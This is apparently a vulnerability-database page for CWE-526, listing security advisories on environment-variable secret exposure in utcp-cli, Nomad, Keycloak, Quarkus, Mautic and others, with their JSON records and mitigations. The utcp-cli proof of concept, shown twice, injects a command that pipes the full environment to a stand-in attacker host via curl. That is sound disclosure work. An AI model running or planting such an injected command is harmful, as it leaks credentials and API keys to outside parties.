CWE-526
AllowedCleartext Storage of Sensitive Information in an Environment Variable
Abstraction: Variant · Status: Incomplete
The product uses an environment variable to store unencrypted sensitive information.
37 vulnerabilities reference this CWE, most recent first.
GHSA-5V57-8RXJ-3P2R
Vulnerability from github – Published: 2026-05-14 20:56 – Updated: 2026-05-15 23:47Summary
_prepare_environment() in cli_communication_protocol.py passes a full copy of os.environ to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in _substitute_utcp_args() tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.
Vulnerable Code
# cli_communication_protocol.py
def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]:
env = os.environ.copy() # All secrets inherited
if provider.env_vars:
env.update(provider.env_vars)
return env
Impact
Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:
- Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET)
- Database connection strings (DATABASE_URL)
- LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY)
- Internal service tokens
Proof of Concept
# Tool defined as:
{"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"}
# Attacker supplies:
tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"}
# Executed bash script:
# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1)
# -> Full env dump sent to attacker including all secrets
Patched
Fixed in utcp-cli 1.1.2. _prepare_environment no longer copies the full host environment. Inheritance is controlled by a new CliCallTemplate.inherit_env_vars field:
null(default): a small built-in OS-specific allowlist (PATH,HOME,LANGon Unix;PATH,PATHEXT,SYSTEMROOT,USERPROFILE, etc. on Windows) is inherited so shells and binaries continue to work.[]: strict mode -- nothing from the host environment reaches the subprocess; onlyenv_varsis propagated.["FOO", "BAR"]: exactly those host variables are inherited (replaces, not merges with, the default allowlist).
env_vars is always layered on top and overrides any inherited value. Secrets like OPENAI_API_KEY no longer reach the subprocess unless the call template explicitly opts them in.
Mitigation
Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.
Credit
Reported by @ZeroXJacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.1.1"
},
"package": {
"ecosystem": "PyPI",
"name": "utcp-cli"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45370"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:56:07Z",
"nvd_published_at": "2026-05-14T21:16:48Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`_prepare_environment()` in `cli_communication_protocol.py` passes a full copy of `os.environ` to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in `_substitute_utcp_args()` tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.\n\n## Vulnerable Code\n\n```python\n# cli_communication_protocol.py\ndef _prepare_environment(self, provider: CliCallTemplate) -\u003e Dict[str, str]:\n env = os.environ.copy() # All secrets inherited\n if provider.env_vars:\n env.update(provider.env_vars)\n return env\n```\n\n## Impact\n\nAny environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:\n\n- Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET)\n- Database connection strings (DATABASE_URL)\n- LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY)\n- Internal service tokens\n\n## Proof of Concept\n\n```python\n# Tool defined as:\n{\"command\": \"grep UTCP_ARG_pattern_UTCP_END logfile.txt\"}\n\n# Attacker supplies:\ntool_args = {\"pattern\": \"x; env | curl -s -d @- https://attacker.com\"}\n\n# Executed bash script:\n# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2\u003e\u00261)\n# -\u003e Full env dump sent to attacker including all secrets\n```\n\n## Patched\n\nFixed in `utcp-cli` 1.1.2. `_prepare_environment` no longer copies the full host environment. Inheritance is controlled by a new `CliCallTemplate.inherit_env_vars` field:\n\n- `null` (default): a small built-in OS-specific allowlist (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is inherited so shells and binaries continue to work.\n- `[]`: strict mode -- nothing from the host environment reaches the subprocess; only `env_vars` is propagated.\n- `[\"FOO\", \"BAR\"]`: exactly those host variables are inherited (replaces, not merges with, the default allowlist).\n\n`env_vars` is always layered on top and overrides any inherited value. Secrets like `OPENAI_API_KEY` no longer reach the subprocess unless the call template explicitly opts them in.\n\n## Mitigation\n\nUpgrade to `utcp-cli \u003e= 1.1.2`. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.\n\n## Credit\n\nReported by @ZeroXJacks.",
"id": "GHSA-5v57-8rxj-3p2r",
"modified": "2026-05-15T23:47:02Z",
"published": "2026-05-14T20:56:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/universal-tool-calling-protocol/python-utcp/security/advisories/GHSA-5v57-8rxj-3p2r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45370"
},
{
"type": "PACKAGE",
"url": "https://github.com/universal-tool-calling-protocol/python-utcp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection"
}
GHSA-6HV3-7C34-4HX8
Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-04-17 19:21In Nomad before version 0.9.5, when rendering a task template, all environment variables were available to the rendering task. As a fix, only task environment variables are used.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/hashicorp/nomad"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-14802"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-12T17:59:46Z",
"nvd_published_at": "2022-12-26T21:15:00Z",
"severity": "MODERATE"
},
"details": "In Nomad before version 0.9.5, when rendering a task template, all environment variables were available to the rendering task. As a fix, only task environment variables are used.",
"id": "GHSA-6hv3-7c34-4hx8",
"modified": "2023-04-17T19:21:09Z",
"published": "2022-02-15T01:57:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14802"
},
{
"type": "WEB",
"url": "https://github.com/hashicorp/nomad/pull/6055"
},
{
"type": "WEB",
"url": "https://github.com/hashicorp/nomad/commit/e8238305ef0b9ef37be3efd86a8d34bfbed5f63f"
},
{
"type": "WEB",
"url": "https://advisories.gitlab.com/advisory/advgo_github_com_hashicorp_nomad_client_allocrunner_taskrunner_template_GMS_2022_818.html"
},
{
"type": "WEB",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14802"
},
{
"type": "PACKAGE",
"url": "https://github.com/hashicorp/nomad"
},
{
"type": "WEB",
"url": "https://github.com/hashicorp/nomad/releases/tag/v0.9.5"
},
{
"type": "WEB",
"url": "https://www.hashicorp.com/blog/category/nomad"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Hashicorp Nomad Information Exposure Through Environmental Variables"
}
GHSA-6RG8-WQVX-GHG5
Vulnerability from github – Published: 2025-03-10 15:30 – Updated: 2026-06-01 15:30Cleartext Storage of Sensitive Information in an Environment Variable, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Tapandsign Technologies Tap&Sign App allows Password Recovery Exploitation, Functionality Misuse.This issue affects Tap&Sign App: before V.1.025.
{
"affected": [],
"aliases": [
"CVE-2024-12604"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-526"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-10T15:15:36Z",
"severity": "HIGH"
},
"details": "Cleartext Storage of Sensitive Information in an Environment Variable, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Tapandsign Technologies Tap\u0026Sign App allows Password Recovery Exploitation, Functionality Misuse.This issue affects Tap\u0026Sign App: before V.1.025.",
"id": "GHSA-6rg8-wqvx-ghg5",
"modified": "2026-06-01T15:30:32Z",
"published": "2025-03-10T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12604"
},
{
"type": "WEB",
"url": "https://docs.tapandsign.com/tap-and-sign/tap-and-sign-v.1.025-surum-notlari"
},
{
"type": "WEB",
"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0063"
},
{
"type": "WEB",
"url": "https://www.usom.gov.tr/bildirim/tr-25-0063"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-8HXP-QMPH-W5GQ
Vulnerability from github – Published: 2025-10-08 23:32 – Updated: 2025-10-10 14:03A flaw was found in org.keycloak/keycloak-model-storage-service. The KeycloakRealmImport custom resource substitutes placeholders within imported realm documents, potentially referencing environment variables. This substitution process allows for injection attacks when crafted realm documents are processed. An attacker can leverage this to inject malicious content during the realm import procedure. This can lead to unintended consequences within the Keycloak environment.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 26.2.9"
},
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-model-storage-services"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-model-storage-services"
},
"ranges": [
{
"events": [
{
"introduced": "26.3.0"
},
{
"fixed": "26.3.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-9162"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-08T23:32:36Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "A flaw was found in org.keycloak/keycloak-model-storage-service. The `KeycloakRealmImport` custom resource substitutes placeholders within imported realm documents, potentially referencing environment variables. This substitution process allows for injection attacks when crafted realm documents are processed. An attacker can leverage this to inject malicious content during the realm import procedure. This can lead to unintended consequences within the Keycloak environment.",
"id": "GHSA-8hxp-qmph-w5gq",
"modified": "2025-10-10T14:03:37Z",
"published": "2025-10-08T23:32:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-8hxp-qmph-w5gq"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:15336"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:15337"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:15338"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:15339"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:16399"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:16400"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-9162"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389396"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/blob/26.3.3/model/storage-services/src/main/java/org/keycloak/exportimport/AbstractFileBasedImportProvider.java#L36"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/blob/75afda410495a9576e00edc3277ab42ca155f806/model/storage-services/src/main/java/org/keycloak/exportimport/AbstractFileBasedImportProvider.java#L35"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keycloak Potential Variable Reference in Model Storage Services"
}
GHSA-CC73-99RJ-C7FH
Vulnerability from github – Published: 2024-05-01 00:31 – Updated: 2024-06-19 18:31An information disclosure flaw was found in OpenShift's internal image registry operator. AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator's Azure service account.
{
"affected": [],
"aliases": [
"CVE-2024-4369"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-01T00:15:06Z",
"severity": "MODERATE"
},
"details": "An information disclosure flaw was found in OpenShift\u0027s internal image registry operator. AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator\u0027s Azure service account.",
"id": "GHSA-cc73-99rj-c7fh",
"modified": "2024-06-19T18:31:07Z",
"published": "2024-05-01T00:31:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4369"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:3881"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:3889"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-4369"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2278035"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F4V7-3MWW-9GC2
Vulnerability from github – Published: 2025-01-13 16:58 – Updated: 2025-01-14 16:38A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-quarkus-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.0.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-11736"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-13T16:58:08Z",
"nvd_published_at": "2025-01-14T09:15:20Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\n",
"id": "GHSA-f4v7-3mww-9gc2",
"modified": "2025-01-14T16:38:41Z",
"published": "2025-01-13T16:58:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11736"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:0299"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:0300"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-11736"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2328850"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Keycloak allows unrestricted admin use of system and environment variables"
}
GHSA-F8H5-V2VG-46RR
Vulnerability from github – Published: 2024-04-04 15:30 – Updated: 2024-12-13 00:30A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application's build. Thus, running the resulting application inherits the values captured at build time.
However, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It may lead to dangerous behavior if the application does not override these values.
This behavior only happens for configuration properties from the quarkus.* namespace. So, application-specific properties are not captured.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.9.1"
},
"package": {
"ecosystem": "Maven",
"name": "io.quarkus:quarkus-core"
},
"ranges": [
{
"events": [
{
"introduced": "3.9.0.CR1"
},
{
"fixed": "3.9.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.8.3"
},
"package": {
"ecosystem": "Maven",
"name": "io.quarkus:quarkus-core"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0.CR1"
},
{
"fixed": "3.8.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.quarkus:quarkus-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.12.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-2700"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-04T17:01:45Z",
"nvd_published_at": "2024-04-04T14:15:09Z",
"severity": "HIGH"
},
"details": "A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application\u0027s build. Thus, running the resulting application inherits the values captured at build time. \n\nHowever, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It may lead to dangerous behavior if the application does not override these values.\n\nThis behavior only happens for configuration properties from the `quarkus.*` namespace. So, application-specific properties are not captured.",
"id": "GHSA-f8h5-v2vg-46rr",
"modified": "2024-12-13T00:30:50Z",
"published": "2024-04-04T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2700"
},
{
"type": "WEB",
"url": "https://github.com/quarkusio/quarkus/issues/39927"
},
{
"type": "WEB",
"url": "https://github.com/quarkusio/quarkus/commit/2b24dc8dbc8f390c97428783d67614418676fc2e"
},
{
"type": "WEB",
"url": "https://github.com/quarkusio/quarkus/commit/91c3a58eaefe59e0afd430653d1636d664bd593f"
},
{
"type": "WEB",
"url": "https://github.com/quarkusio/quarkus/commit/990c3ee5dd5c689f514e5e87c221bce6d5dff267"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:11023"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:2106"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:2705"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:3527"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:4028"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:4873"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-2700"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2273281"
},
{
"type": "PACKAGE",
"url": "https://github.com/quarkusio/quarkus"
},
{
"type": "WEB",
"url": "https://quarkus.io/blog/quarkus-3-2-12-final-released"
},
{
"type": "WEB",
"url": "https://quarkus.io/blog/quarkus-3-8-4-released"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "quarkus-core leaks local environment variables from Quarkus namespace during application\u0027s build"
}
GHSA-GWPF-2PC2-R92W
Vulnerability from github – Published: 2023-11-09 15:30 – Updated: 2023-11-09 15:30A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system.
{
"affected": [],
"aliases": [
"CVE-2023-47615"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-09T13:15:07Z",
"severity": "LOW"
},
"details": "A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system.",
"id": "GHSA-gwpf-2pc2-r92w",
"modified": "2023-11-09T15:30:28Z",
"published": "2023-11-09T15:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47615"
},
{
"type": "WEB",
"url": "https://ics-cert.kaspersky.com/advisories/2023/11/09/klcert-22-212-telit-cinterion-thales-gemalto-modules-exposure-of-sensitive-information-through-environmental-variables"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-H2WG-V8WG-JHXH
Vulnerability from github – Published: 2025-05-28 17:38 – Updated: 2025-05-28 20:07Summary
This advisory addresses a security vulnerability in Mautic where sensitive .env configuration files may be directly accessible via a web browser. This exposure could lead to the disclosure of sensitive information, including database credentials, API keys, and other critical system configurations.
Sensitive Information Disclosure via .env File Exposure: The .env file, which typically contains environment variables and sensitive application configurations, is directly accessible via a web browser due to missing web server configurations that restrict access to such files. This allows an unauthenticated attacker to view the contents of this file by simply navigating to its URL.
Mitigation
Update Mautic to the latest Mautic version.
By default, Mautic does not use .env files for production data.
For Apache users: Ensure your web server is configured to respect .htaccess files.
For Nginx users: As Nginx does not inherently support .htaccess files, you must manually add a configuration block to your Nginx server configuration to deny access to .env files. Add the following to your Nginx configuration for the Mautic site:
location ~ /\.env {
deny all;
}
After modifying your Nginx configuration, remember to reload or restart your Nginx service for the changes to take effect.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "mautic/core"
},
"ranges": [
{
"events": [
{
"introduced": "4.4.0"
},
{
"fixed": "4.4.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "mautic/core"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-alpha"
},
{
"fixed": "5.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "mautic/core"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0-alpha"
},
{
"fixed": "6.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47056"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-28T17:38:38Z",
"nvd_published_at": "2025-05-28T17:15:23Z",
"severity": "MODERATE"
},
"details": "### Summary \nThis advisory addresses a security vulnerability in Mautic where sensitive `.env` configuration files may be directly accessible via a web browser. This exposure could lead to the disclosure of sensitive information, including database credentials, API keys, and other critical system configurations.\n\nSensitive Information Disclosure via `.env` File Exposure: The `.env` file, which typically contains environment variables and sensitive application configurations, is directly accessible via a web browser due to missing web server configurations that restrict access to such files. This allows an unauthenticated attacker to view the contents of this file by simply navigating to its URL.\n\n### Mitigation\nUpdate Mautic to the latest Mautic version.\nBy default, Mautic does not use `.env` files for production data.\n\n**For Apache users:** Ensure your web server is configured to respect `.htaccess` files.\n\n**For Nginx users:** As Nginx does not inherently support `.htaccess` files, you must manually add a configuration block to your Nginx server configuration to deny access to `.env` files. Add the following to your Nginx configuration for the Mautic site:\n\n```nginx\nlocation ~ /\\.env {\n deny all;\n}\n```\n\nAfter modifying your Nginx configuration, remember to reload or restart your Nginx service for the changes to take effect.",
"id": "GHSA-h2wg-v8wg-jhxh",
"modified": "2025-05-28T20:07:50Z",
"published": "2025-05-28T17:38:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mautic/mautic/security/advisories/GHSA-h2wg-v8wg-jhxh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47056"
},
{
"type": "PACKAGE",
"url": "https://github.com/mautic/mautic"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Mautic does not shield .env files from web traffic"
}
GHSA-P62Q-5483-H57V
Vulnerability from github – Published: 2023-11-15 15:30 – Updated: 2023-11-15 17:54A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.quarkus:quarkus-project"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0.CR1"
},
{
"last_affected": "3.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-5720"
],
"database_specific": {
"cwe_ids": [
"CWE-526"
],
"github_reviewed": true,
"github_reviewed_at": "2023-11-15T17:54:00Z",
"nvd_published_at": "2023-11-15T14:15:07Z",
"severity": "HIGH"
},
"details": "A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.",
"id": "GHSA-p62q-5483-h57v",
"modified": "2023-11-15T17:54:00Z",
"published": "2023-11-15T15:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5720"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2023-5720"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245700"
},
{
"type": "PACKAGE",
"url": "https://github.com/quarkusio/quarkus"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Quarkus does not properly sanitize artifacts created from its use of the Gradle plugin, allowing certain build system information to remain"
}
Mitigation
Encrypt information stored in the environment variable to protect it from being exposed to an unauthorized user. If encryption is not feasible or is considered too expensive for the business use of the application, then consider using a properly protected configuration file instead of an environment variable. It should be understood that unencrypted information in a config file is also not guaranteed to be protected, but it is still a better choice, because it reduces attack surface related to weaknesses such as CWE-214. In some settings, vaults might be a feasible option for safer data transfer. Users should be notified of the business choice made to not protect the sensitive information through encryption.
Mitigation
If the environment variable is not necessary for the desired behavior, then remove it entirely, or clear it to an empty value.
No CAPEC attack patterns related to this CWE.